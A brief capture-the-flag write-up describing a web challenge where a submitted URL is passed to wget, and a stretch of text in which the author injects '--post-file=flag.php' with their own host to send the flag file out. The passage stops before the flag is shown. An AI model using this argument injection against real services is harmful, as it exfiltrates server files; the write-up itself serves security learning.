When we open the website, we can enter an URL to download, when we follow the example (
http://example.com/image.jpg), we get some shell output:
... $ wget https://example.com/image.jpeg 2>&1 ...
From the page source, we can see that we need to get the contents of
flag.php. I just simply added to the original query
So it becomes:
http://example.com/image.jpg --post-file=flag.php mysite
And after a second, we get our flag: